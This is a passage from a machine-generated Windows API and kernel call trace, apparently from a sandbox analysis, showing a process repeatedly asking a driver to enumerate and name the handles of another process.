HandleInformation=0x0) returned 0x0 [0225.228] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.228] PsReleaseProcessExitSynchronization () returned 0x2 [0225.228] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.228] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.228] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0225.228] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.229] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.229] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.229] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.229] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.229] PsAcquireProcessExitSynchronization () returned 0x0 [0225.229] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.229] ObReferenceObjectByHandle (in: Handle=0x94c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f9c4a0, HandleInformation=0x0) returned 0x0 [0225.229] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.229] PsReleaseProcessExitSynchronization () returned 0x2 [0225.229] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.229] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.229] ObfDereferenceObject (Object=0xfffffa8001f9c4a0) returned 0x1 [0225.229] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.229] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.229] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.229] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0225.229] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.229] PsAcquireProcessExitSynchronization () returned 0x0 [0225.229] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.229] ObReferenceObjectByHandle (in: Handle=0x950, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003ab6070, HandleInformation=0x0) returned 0x0 [0225.229] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.229] PsReleaseProcessExitSynchronization () returned 0x2 [0225.229] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.229] ObQueryNameString (in: Object=0xfffffa8003ab6070, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.229] ObfDereferenceObject (Object=0xfffffa8003ab6070) returned 0x1 [0225.229] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.230] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.230] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.230] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0225.230] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.230] PsAcquireProcessExitSynchronization () returned 0x0 [0225.230] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.230] ObReferenceObjectByHandle (in: Handle=0x958, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0225.230] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.230] PsReleaseProcessExitSynchronization () returned 0x2 [0225.230] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.230] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.230] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0x10 [0225.230] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.230] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.230] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.230] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.230] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.230] PsAcquireProcessExitSynchronization () returned 0x0 [0225.230] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.230] ObReferenceObjectByHandle (in: Handle=0x980, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003525c70, HandleInformation=0x0) returned 0x0 [0225.230] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.230] PsReleaseProcessExitSynchronization () returned 0x2 [0225.230] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.230] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.230] ObfDereferenceObject (Object=0xfffffa8003525c70) returned 0x1 [0225.230] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.231] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.231] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.231] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0225.231] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.231] PsAcquireProcessExitSynchronization () returned 0x0 [0225.231] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.231] ObReferenceObjectByHandle (in: Handle=0x984, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003ab4cf0, HandleInformation=0x0) returned 0x0 [0225.231] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.231] PsReleaseProcessExitSynchronization () returned 0x2 [0225.231] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.231] ObQueryNameString (in: Object=0xfffffa8003ab4cf0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.231] ObfDereferenceObject (Object=0xfffffa8003ab4cf0) returned 0x1 [0225.231] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.231] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.231] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.231] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.231] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.231] PsAcquireProcessExitSynchronization () returned 0x0 [0225.231] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.231] ObReferenceObjectByHandle (in: Handle=0x9f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a949e0, HandleInformation=0x0) returned 0x0 [0225.231] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.231] PsReleaseProcessExitSynchronization () returned 0x2 [0225.231] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.231] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.232] ObfDereferenceObject (Object=0xfffffa8003a949e0) returned 0x1 [0225.232] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.232] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.232] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.232] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.232] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.232] PsAcquireProcessExitSynchronization () returned 0x0 [0225.232] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.232] ObReferenceObjectByHandle (in: Handle=0xa20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a94890, HandleInformation=0x0) returned 0x0 [0225.232] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.232] PsReleaseProcessExitSynchronization () returned 0x2 [0225.232] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.232] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.232] ObfDereferenceObject (Object=0xfffffa8003a94890) returned 0x1 [0225.232] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.232] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.232] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.232] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.232] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.232] PsAcquireProcessExitSynchronization () returned 0x0 [0225.232] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.232] ObReferenceObjectByHandle (in: Handle=0xa34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039b5dd0, HandleInformation=0x0) returned 0x0 [0225.232] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.232] PsReleaseProcessExitSynchronization () returned 0x2 [0225.232] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.232] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.232] ObfDereferenceObject (Object=0xfffffa80039b5dd0) returned 0x1 [0225.232] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.232] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.232] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.233] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.233] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.233] PsAcquireProcessExitSynchronization () returned 0x0 [0225.233] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.233] ObReferenceObjectByHandle (in: Handle=0xa3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800399c230, HandleInformation=0x0) returned 0x0 [0225.233] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.233] PsReleaseProcessExitSynchronization () returned 0x2 [0225.233] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.233] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.233] ObfDereferenceObject (Object=0xfffffa800399c230) returned 0x1 [0225.233] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.233] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.233] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.233] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.233] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.233] PsAcquireProcessExitSynchronization () returned 0x0 [0225.233] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.233] ObReferenceObjectByHandle (in: Handle=0xa9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003acdb30, HandleInformation=0x0) returned 0x0 [0225.233] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.233] PsReleaseProcessExitSynchronization () returned 0x2 [0225.233] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.233] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.233] ObfDereferenceObject (Object=0xfffffa8003acdb30) returned 0x1 [0225.233] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.233] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.234] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.234] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.234] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.234] PsAcquireProcessExitSynchronization () returned 0x0 [0225.234] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.234] ObReferenceObjectByHandle (in: Handle=0xac0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f9c5f0, HandleInformation=0x0) returned 0x0 [0225.234] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.234] PsReleaseProcessExitSynchronization () returned 0x2 [0225.234] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.234] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.234] ObfDereferenceObject (Object=0xfffffa8001f9c5f0) returned 0x1 [0225.234] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.234] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.234] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.234] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xaa, lpOverlapped=0x0) returned 1 [0225.234] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.234] PsAcquireProcessExitSynchronization () returned 0x0 [0225.234] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.234] ObReferenceObjectByHandle (in: Handle=0xae4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a5a070, HandleInformation=0x0) returned 0x0 [0225.234] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.235] PsReleaseProcessExitSynchronization () returned 0x2 [0225.235] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.235] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.235] ObfDereferenceObject (Object=0xfffffa8003a5a070) returned 0x1 [0225.235] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.235] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.235] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.235] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.235] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.235] PsAcquireProcessExitSynchronization () returned 0x0 [0225.235] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.235] ObReferenceObjectByHandle (in: Handle=0xaf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a5abb0, HandleInformation=0x0) returned 0x0 [0225.235] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.235] PsReleaseProcessExitSynchronization () returned 0x2 [0225.235] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.235] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.235] ObfDereferenceObject (Object=0xfffffa8003a5abb0) returned 0x1 [0225.235] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.235] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.235] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.235] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.236] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.236] PsAcquireProcessExitSynchronization () returned 0x0 [0225.236] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.236] ObReferenceObjectByHandle (in: Handle=0xb08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028141b0, HandleInformation=0x0) returned 0x0 [0225.236] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.236] PsReleaseProcessExitSynchronization () returned 0x2 [0225.236] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.236] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.236] ObfDereferenceObject (Object=0xfffffa80028141b0) returned 0x1 [0225.236] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.236] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.236] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.236] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.236] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.236] PsAcquireProcessExitSynchronization () returned 0x0 [0225.236] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.236] ObReferenceObjectByHandle (in: Handle=0xb2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017affc0, HandleInformation=0x0) returned 0x0 [0225.236] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.236] PsReleaseProcessExitSynchronization () returned 0x2 [0225.236] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.236] ObQueryNameString (in: Object=0xfffff8a0017affc0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.236] ObfDereferenceObject (Object=0xfffff8a0017affc0) returned 0x1 [0225.236] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.236] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.236] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) 